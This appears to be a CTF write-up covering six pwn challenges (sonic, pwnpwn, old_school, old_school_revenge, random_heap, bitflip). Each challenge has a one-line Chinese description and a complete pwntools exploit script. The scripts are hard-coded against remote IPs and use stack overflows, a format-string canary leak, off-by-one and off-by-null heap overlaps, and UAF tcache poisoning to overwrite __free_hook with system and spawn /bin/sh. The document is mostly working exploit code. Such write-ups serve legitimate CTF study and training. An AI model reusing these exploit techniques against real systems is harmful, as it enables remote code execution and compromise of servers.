sonic

远程服务器上 /usr/bin/cli 是个 cat flag 程序,栈溢出劫持运行后面函数即可

EXP

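from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'

# Offsets inside the PIE image, carried over from the original exploit:
# the binary prints an address that sits at +0x7cf from its base, and the
# function we want to run (per the write-up, the one that ends up running
# /usr/bin/cli, a cat-flag program) is at +0x73a.
LEAK_OFFSET = 0x7cf
TARGET_OFFSET = 0x73A
# Bytes of filler between the overflowed buffer and the saved return
# address (offset taken from the original exploit).
RET_OFFSET = 0x28

# r = process('./sonic')
r = remote('123.60.63.90', '6889')

# gdb.attach(r, "b *$rebase(0x7B4)")
# raw_input()

# The binary leaks a code pointer after " Address=".  recv(15) returns
# whatever has arrived so far, so a short read would hand int() a truncated
# number; the page-alignment check below catches that instead of letting a
# garbage address be sent.
r.recvuntil(" Address=")
addr = int(r.recv(15), 16)
base = addr - LEAK_OFFSET
print("leak: %#x  pie base: %#x" % (addr, base))
if base & 0xfff:
    # ELF images are mapped page-aligned; anything else means the leak was
    # mis-parsed and the payload would only crash the target.
    raise RuntimeError("PIE base %#x is not page-aligned, leak parsed wrongly" % base)

# Plain stack overflow: filler up to the saved return address, then the
# address of the target function (no canary to deal with in this binary,
# judging by the original payload).
payload = 'a' * RET_OFFSET + p64(base + TARGET_OFFSET)
r.sendline(payload)
r.interactive()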

pwnpwn

预留后门的格式化字符串题目

EXP

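from pwn import *
# context.log_level = 'debug'

# PIE-relative constants, carried over from the original exploit.
LEAK_OFFSET = 0x9b9            # offset of the address printed by option 1
CHAIN = (0xb83, 0x202010, 0x951)   # three values placed after the saved rbp
# Distance from the overflowed buffer to the stack canary (0x70 - 8 in the
# original payload).
CANARY_OFFSET = 0x70 - 8

# r = process('./pwnpwn')
r = remote('124.71.156.217', '49153')

# Option 1 prints a code pointer after "let us give you some trick"; that
# gives the PIE base.  recv(15) is a fixed-width read, so the result is
# sanity-checked below rather than trusted blindly.
r.recv()
r.sendline('1')
r.recvuntil("let us give you some trick\n")
leak = int(r.recv(15), 16)
base = leak - LEAK_OFFSET
print("leak: %#x  pie base: %#x" % (leak, base))
if base & 0xfff:
    raise RuntimeError("PIE base %#x is not page-aligned, leak parsed wrongly" % base)

# Option 2 is the format-string bug.  "%21$p" prints the 21st stack
# argument, which is the canary (argument index found in the original
# script); the two bytes the program prints before the value are skipped.
r.sendline('2')
r.recv()
r.sendline('%21$p')
r.recv(2)
canary = int(r.recv(0x12), 16)
print("canary: %#x" % canary)
if canary & 0xff:
    # glibc's x86-64 stack canary always has a zero low byte; a non-zero
    # byte means the leak was mis-parsed and the overflow would just abort.
    raise RuntimeError("canary %#x has a non-zero low byte, leak parsed wrongly" % canary)

# Stack overflow: filler up to the canary, the leaked canary so the check
# passes, 8 bytes over the saved rbp, then the three PIE-relative values.
# The original script does not name them -- presumably a gadget, its
# argument and the pre-placed backdoor the write-up mentions; confirm
# against the binary before reusing these offsets.
payload = 'a' * CANARY_OFFSET + p64(canary) + 'a' * 8
payload += ''.join(p64(base + off) for off in CHAIN)
r.sendline(payload)
r.interactive()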

old_school

off by one

测试的时候从 unsortedbin 中 malloc 会清空 fd/bk 指针,所以先重叠堆空间,再泄露地址完成利用

EXP

from pwn import *
context.log_level = 'debug'

def add(idx,size):
    """Menu option 1: allocate slot ``idx`` with ``size`` bytes.

    Each prompt is drained with a bare recv() before the answer is sent,
    exactly as the rest of the script does.
    """
    for answer in ('1', str(idx), str(size)):
        p.recv()
        p.sendline(answer)

def edit(idx,con):
    """Menu option 2: overwrite slot ``idx`` with ``con`` (sent with a trailing newline)."""
    for answer in ('2', str(idx), con):
        p.recv()
        p.sendline(answer)

def show(idx):
    """Menu option 3: print slot ``idx``; the caller parses the output."""
    for answer in ('3', str(idx)):
        p.recv()
        p.sendline(answer)
def dele(idx):
    """Menu option 4: free slot ``idx``."""
    for answer in ('4', str(idx)):
        p.recv()
        p.sendline(answer)

#p = process("./old_school")
#libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
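p = remote('121.36.194.21', '49154')
# __free_hook/system offsets come from the *local* libc while the main_arena
# offset below is hard-coded; both only hold if the remote libc is the same
# build (the constant matches Ubuntu 18.04's glibc 2.27).
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

MAIN_ARENA_OFFSET = 0x3ebc40   # main_arena - libc base for the target libc
CHUNK = 0xf8                   # 0x100 chunks: tcache-sized, but not fastbin

# --- 1. build an overlap: a free chunk that covers slot 1 -----------------
for i in range(10):
    add(i, CHUNK)
# Free 7..0: seven chunks fill the tcache, chunk 0 lands in the unsorted bin.
for i in range(7, -1, -1):
    dele(i)
# Refill slots 1..7 from the tcache; chunk 0 stays free.
for i in range(7):
    add(i + 1, CHUNK)
# Off-by-one: 0xf0 bytes of filler, a fake prev_size of 0x200 (chunks 0+1),
# then one NUL into the low byte of chunk 2's size, clearing PREV_INUSE.
edit(1, 0xf0 * 'a' + p64(0x200) + '\x00')
# Free 9..2: seven go to the tcache, then chunk 2 consolidates backwards
# over chunks 1 and 0 into a single free chunk that overlaps slot 1.
for i in range(9, 1, -1):
    dele(i)
for i in range(7):
    add(i + 3, CHUNK)
# Carve chunk 0 off the merged chunk; the remainder now starts at slot 1,
# so slot 1's first 16 bytes are the unsorted-bin fd/bk.
add(0, CHUNK)
show(1)

# --- 2. libc leak -----------------------------------------------------------
main_arean_96 = u64(p.recvuntil("\x7f")[-6::].ljust(8, '\x00'))
print("main_arean_96: %#x" % main_arean_96)
libc_addr = main_arean_96 - 96 - MAIN_ARENA_OFFSET
print("libc_addr: %#x" % libc_addr)
if libc_addr & 0xfff:
    # libc is mapped page-aligned; anything else means the leak was
    # mis-parsed and every address below would be garbage.
    raise RuntimeError("libc base %#x is not page-aligned, leak parsed wrongly" % libc_addr)
free_hook = libc_addr + libc.sym['__free_hook']
system = libc_addr + libc.sym['system']

# --- 3. tcache poisoning through the overlap --------------------------------
# Slot 2 is carved from the remainder, i.e. it aliases slot 1.
add(2, CHUNK)
dele(2)
# Zero the tcache next/key words through the alias before freeing again
# (kept from the original; presumably so a patched 2.27 with the tcache
# double-free check does not abort).
edit(1, p64(0) * 2)
dele(2)
# Tcache next pointer -> __free_hook.
edit(1, p64(free_hook) * 2)
add(10, CHUNK)
add(11, CHUNK)                 # this allocation returns __free_hook itself
edit(11, p64(system))
# Slot 1 aliases slot 10; free() will be handed "/bin/sh".
edit(1, "/bin/sh\x00\x00")

# gdb.attach(p)
# raw_input()

dele(1)                        # free("/bin/sh") -> system("/bin/sh")

p.interactive()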

old_school_revenge

Off by null ,直接套上一题脚本

EXP

from pwn import *
context.log_level = 'debug'

def add(idx,size):
    """Menu option 1: allocate slot ``idx`` with ``size`` bytes.

    Each prompt is drained with a bare recv() before the answer is sent.
    """
    for answer in ('1', str(idx), str(size)):
        p.recv()
        p.sendline(answer)

def edit(idx,con):
    """Menu option 2: overwrite slot ``idx`` with ``con`` (sent with a trailing newline)."""
    for answer in ('2', str(idx), con):
        p.recv()
        p.sendline(answer)

def show(idx):
    """Menu option 3: print slot ``idx``; the caller parses the output."""
    for answer in ('3', str(idx)):
        p.recv()
        p.sendline(answer)
def dele(idx):
    """Menu option 4: free slot ``idx``."""
    for answer in ('4', str(idx)):
        p.recv()
        p.sendline(answer)

#p = process("./old_school_revenge")
#libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
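p = remote('121.36.194.21', '49154')
# __free_hook/system offsets come from the *local* libc while the main_arena
# offset below is hard-coded; both only hold if the remote libc is the same
# build (the constant matches Ubuntu 18.04's glibc 2.27).
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

MAIN_ARENA_OFFSET = 0x3ebc40   # main_arena - libc base for the target libc
CHUNK = 0xf8                   # 0x100 chunks: tcache-sized, but not fastbin

# --- 1. build an overlap: a free chunk that covers slot 1 -----------------
for i in range(10):
    add(i, CHUNK)
# Free 7..0: seven chunks fill the tcache, chunk 0 lands in the unsorted bin.
for i in range(7, -1, -1):
    dele(i)
# Refill slots 1..7 from the tcache; chunk 0 stays free.
for i in range(7):
    add(i + 1, CHUNK)
# Off-by-null: 0xf0 bytes of filler plus a fake prev_size of 0x200 (chunks
# 0+1) fill the slot exactly; the program's own terminating NUL then lands
# in the low byte of chunk 2's size and clears PREV_INUSE (same idea as
# old_school, minus the explicit '\x00').
edit(1, 0xf0 * 'a' + p64(0x200))
# Free 9..2: seven go to the tcache, then chunk 2 consolidates backwards
# over chunks 1 and 0 into a single free chunk that overlaps slot 1.
for i in range(9, 1, -1):
    dele(i)
for i in range(7):
    add(i + 3, CHUNK)
# Carve chunk 0 off the merged chunk; the remainder now starts at slot 1,
# so slot 1's first 16 bytes are the unsorted-bin fd/bk.
add(0, CHUNK)

show(1)

# --- 2. libc leak -----------------------------------------------------------
main_arean_96 = u64(p.recvuntil("\x7f")[-6::].ljust(8, '\x00'))
print("main_arean_96: %#x" % main_arean_96)
libc_addr = main_arean_96 - 96 - MAIN_ARENA_OFFSET
print("libc_addr: %#x" % libc_addr)
if libc_addr & 0xfff:
    # libc is mapped page-aligned; anything else means the leak was
    # mis-parsed and every address below would be garbage.
    raise RuntimeError("libc base %#x is not page-aligned, leak parsed wrongly" % libc_addr)
free_hook = libc_addr + libc.sym['__free_hook']
system = libc_addr + libc.sym['system']

# --- 3. tcache poisoning through the overlap --------------------------------
# Slot 2 is carved from the remainder, i.e. it aliases slot 1.
add(2, CHUNK)
dele(2)
# Zero the tcache next/key words through the alias before freeing again
# (kept from the original; presumably so a patched 2.27 with the tcache
# double-free check does not abort).
edit(1, p64(0) * 2)
dele(2)
# Tcache next pointer -> __free_hook.
edit(1, p64(free_hook) * 2)
add(10, CHUNK)
add(11, CHUNK)                 # this allocation returns __free_hook itself
edit(11, p64(system))
# Slot 1 aliases slot 10; free() will be handed "/bin/sh".
edit(1, "/bin/sh\x00\x00")

dele(1)                        # free("/bin/sh") -> system("/bin/sh")

# gdb.attach(p)
# raw_input()
p.interactive()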

random_heap

UAF,但是 malloc 的大小是随机的,需要爆破,尽量复用堆块提高成功概率

EXP

#!/usr/bin/python
#-*-coding:utf-8-*-
from pwn import *
import sys
from ctypes import *
import time
import random

'''
patchelf --set-interpreter /glibc/2.27/amd64/lib/ld-2.27.so --set-rpath /glibc/2.27/amd64/lib random_heap
'''

#r=process('./pe')
#r=remote('124.71.140.198','49154')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
#v0=(round(time.time()))
#random.seed(v0)
#def float_to_hex(f):
# return int(struct.unpack('<I', struct.pack('<f', f))[0])
#def myrand(size):
# new=int(size)
# v=float_to_hex(random.random())
# v2=int(0xf)
# v1=(v & v2)
# v3=v1*16
# print(hex(v3))
# if size==v3:
# return 0
# else:
# return size-v3


def add(idx,size):
    """Menu option 1: allocate slot ``idx`` with ``size`` bytes.

    Each prompt is drained with a bare recv() before the answer is sent.
    """
    for answer in ('1', str(idx), str(size)):
        r.recv()
        r.sendline(answer)
def edit(idx,con):
    """Menu option 2: overwrite slot ``idx`` with ``con`` (sent with a trailing newline)."""
    for answer in ('2', str(idx), con):
        r.recv()
        r.sendline(answer)
def show(idx):
    """Menu option 3: print slot ``idx``; the caller parses the output."""
    for answer in ('3', str(idx)):
        r.recv()
        r.sendline(answer)
def dele(idx):
    """Menu option 4: free slot ``idx``."""
    for answer in ('4', str(idx)):
        r.recv()
        r.sendline(answer)





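def pwn():
    """One attempt at the UAF exploit against the global connection ``r``.

    The target randomises the size it actually allocates (see the commented
    ``myrand`` model above), so this only works when the sizes happen to line
    up; the caller reconnects and retries.  Any failure -- a timed-out read,
    a mis-parsed leak or a tcache fd that did not land on ``__free_hook`` --
    is reported by raising, which the retry loop treats as "try again".
    Uses the module globals ``r``, ``libc`` and the menu helpers.
    """
    add(0, 0xf8)
    add(1, 0x100)
    edit(1, "/bin/sh\x00\x00")       # slot 1 is what gets free()d at the end
    # Double free of slot 0: edit() after the first free clobbers the tcache
    # next/key words so the second free is accepted.
    dele(0)
    edit(0, 'a' * 0x10)
    dele(0)
    show(0)
    # With timeouts the reads return '' instead of blocking; a bad value
    # shows up as a failed sanity check below rather than a hang.
    r.recvuntil("Content: ", timeout=0.4)
    info = r.recvuntil("\n", timeout=0.4, drop=True)
    heap_addr = u64(info.ljust(8, b"\x00"))
    log.info("heap_addr: " + hex(heap_addr))
    # Six more frees of the same chunk overflow the tcache count; the last
    # free goes to the unsorted bin, whose fd is main_arena+96.
    for i in range(6):
        edit(0, 'a' * 0x10)
        dele(0)
    show(0)
    main_arean_96 = u64(((r.recvuntil("\x7f", timeout=0.4))[-6::]).ljust(8, '\x00'))
    log.info("main_arean_96: " + hex(main_arean_96))
    # 0x3ebc40 is main_arena's offset in the target libc (2.27); 0x3aec40 was
    # a previous candidate kept here for reference.
    libc_base = (main_arean_96 - 96) - 0x3ebc40  # 0x3aec40
    print("libc_base: %#x" % libc_base)
    if libc_base & 0xfff:
        # libc is mapped page-aligned; fail this attempt early instead of
        # poisoning the tcache with a garbage address.
        raise RuntimeError("libc base %#x is not page-aligned, leak parsed wrongly" % libc_base)

    free_hook = libc_base + libc.sym['__free_hook']
    system = libc_base + libc.sym['system']

    # Slot 2 is (hopefully) carved from the space slot 0 still points at, so
    # editing slot 0 rewrites slot 2's tcache next pointer: double free it and
    # point the fd at __free_hook.
    add(2, 0x18)
    dele(2)
    edit(0, p64(free_hook) * 2)
    dele(2)
    edit(0, p64(free_hook) * 2)
    add(2, 0x18)
    show(2)
    tmp = u64(((r.recvuntil("\x7f", timeout=0.4))[-6::]).ljust(8, '\x00'))
    if tmp != free_hook:
        # The randomised size did not line up; a plain exception (rather
        # than exit()) keeps this attempt's failure distinguishable from a
        # deliberate shutdown and lets the retry loop carry on.
        raise RuntimeError("tcache fd %#x != __free_hook %#x, retrying" % (tmp, free_hook))

    # gdb.attach(r, "b *$rebase(0xBCB)")
    # raw_input()

    add(3, 0x18)                     # returns __free_hook
    edit(3, p64(system))
    dele(1)                          # free("/bin/sh") -> system("/bin/sh")

    r.sendline("cat flag")
    print(r.recvuntil("}", timeout=0.4))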


#context.log_level='debug'


#r = process("./random_heap", env={"LD_PRELOAD":"./libc-2.27.so"})
#libc = ELF("libc-2.27.so")
#r = process("./random_heap")
#libc = ELF("/glibc/2.27/amd64/lib/libc.so.6")

#r = process("./uaf")
#libc = ELF("/glibc/2.27/amd64/lib/libc.so.6")
#r = process("./uaf", env={"LD_PRELOAD":"./libc-2.27.so"})
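libc = ELF("libc-2.27.so")

# pwn()
# r.interactive()

# The allocation size is randomised server-side, so the exploit only works
# when the heap happens to line up; keep reconnecting until pwn() gets
# through.  Everything pwn() raises counts as a failed attempt -- including
# SystemExit, because the original pwn() bails out with exit() on a bad
# leak.  Ctrl-C is re-raised so the loop can actually be stopped (a bare
# except: used to swallow it), and a successful session ends the loop
# instead of reconnecting forever.
times = 0
r = None
while True:
    try:
        # r = process("./random_heap")
        r = remote("124.71.140.198", 49155)
        pwn()
        r.interactive()
        break
    except KeyboardInterrupt:
        raise
    except (Exception, SystemExit):
        times += 1
        print("=" * 8 + str(times) + " times" + "=" * 8)
        # remote() itself may have failed, in which case there is nothing
        # to close (the original crashed with NameError/stale handle here).
        if r is not None:
            r.close()
            r = None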

bitflip

off by one

EXP

from pwn import *
context.log_level = 'debug'

def add(idx,size):
    """Menu option 1: allocate slot ``idx`` with ``size`` bytes.

    Each prompt is drained with a bare recv() before the answer is sent.
    """
    for answer in ('1', str(idx), str(size)):
        r.recv()
        r.sendline(answer)
def edit(idx,con):
    """Menu option 2: overwrite slot ``idx`` with ``con``.

    Unlike the other helpers the content goes out with send(), not
    sendline(): callers append their own terminator when they need one.
    """
    for answer in ('2', str(idx)):
        r.recv()
        r.sendline(answer)
    r.recv()
    r.send(con)
def show(idx):
    """Menu option 3: print slot ``idx``; the index is sent once "Index: " is seen."""
    menu_choice, slot = '3', str(idx)
    r.recv()
    r.sendline(menu_choice)
    r.sendlineafter("Index: ", slot)
def dele(idx):
    """Menu option 4: free slot ``idx``; the index is sent once "Index: " is seen."""
    menu_choice, slot = '4', str(idx)
    r.recv()
    r.sendline(menu_choice)
    r.sendlineafter("Index: ", slot)



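# The original spawned a local ./bitflip here and immediately replaced the
# handle with the remote connection, leaving an orphaned child process
# behind; keep exactly one target.
# r = process("./bitflip")
r = remote("124.71.130.185", 49155)
# __free_hook/system offsets come from the *local* libc while the main_arena
# offset below is hard-coded; both only hold if the remote libc is the same
# build (the constant matches Ubuntu 18.04's glibc 2.27).
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

MAIN_ARENA_OFFSET = 0x3ebc40   # main_arena - libc base for the target libc
CHUNK = 0x48                   # 0x50 chunks: tcache first, fastbin once it is full
# A 0x1000-byte menu "choice" (kept from the original).  Presumably it forces
# a large allocation inside the program's input routine, which triggers
# malloc_consolidate and moves the fastbin chunk into a regular bin --
# confirm against the binary before reusing.
FLUSH = '0' * 0x1000

# --- 1. build an overlap: a free chunk that covers slot 1 -----------------
for i in range(10):
    add(i, CHUNK)
# Free 7..0: seven fill the tcache, chunk 0 goes to the fastbin ...
for i in range(7, -1, -1):
    dele(i)
# ... and is consolidated out of it here.
r.sendlineafter("choice: ", FLUSH)
for i in range(7):
    add(i + 1, CHUNK)
# Off-by-one (edit() uses send(), so nothing is appended): 0x40 bytes of
# filler, a fake prev_size of 0xa0 (chunks 0+1), then 0x50 into the low byte
# of chunk 2's size, clearing PREV_INUSE.
edit(1, 'a' * 0x40 + p64(0xa0) + '\x50')
# Free 9..2: seven to the tcache, chunk 2 to the fastbin; the flush then
# consolidates chunk 2 backwards over chunks 1 and 0, overlapping slot 1.
for i in range(9, 1, -1):
    dele(i)
r.sendlineafter("choice: ", FLUSH)
for i in range(7):
    add(i + 2, CHUNK)
# Carve the merged chunk up again; slot 1's data ends up holding bin
# pointers (main_arena+96) from when it headed the remainder.
add(0, CHUNK)
add(9, CHUNK)
add(10, CHUNK)
show(1)

# --- 2. libc leak -----------------------------------------------------------
main_arean_96 = u64(r.recvuntil('\x7f')[-6::].ljust(8, '\x00'))
print("main_arean_96: %#x" % main_arean_96)
libc_addr = main_arean_96 - 96 - MAIN_ARENA_OFFSET
print("libc_addr: %#x" % libc_addr)
if libc_addr & 0xfff:
    # libc is mapped page-aligned; anything else means the leak was
    # mis-parsed and every address below would be garbage.
    raise RuntimeError("libc base %#x is not page-aligned, leak parsed wrongly" % libc_addr)
free_hook = libc_addr + libc.sym['__free_hook']
system = libc_addr + libc.sym['system']

# --- 3. tcache poisoning through the overlap --------------------------------
# Slot 9 aliases slot 1; free both so the tcache holds two entries, then
# rewrite the head's next pointer through slot 1 to point at __free_hook.
# The '\n' terminates the program's read since edit() does not add one.
dele(3)
dele(9)
edit(1, p64(free_hook) * 2 + '\n')
add(3, CHUNK)
add(11, CHUNK)                 # this allocation returns __free_hook itself
edit(11, p64(system) + '\n')
edit(4, "/bin/sh\x00\n")

# gdb.attach(r)
# raw_input()

dele(4)                        # free("/bin/sh") -> system("/bin/sh")

r.interactive()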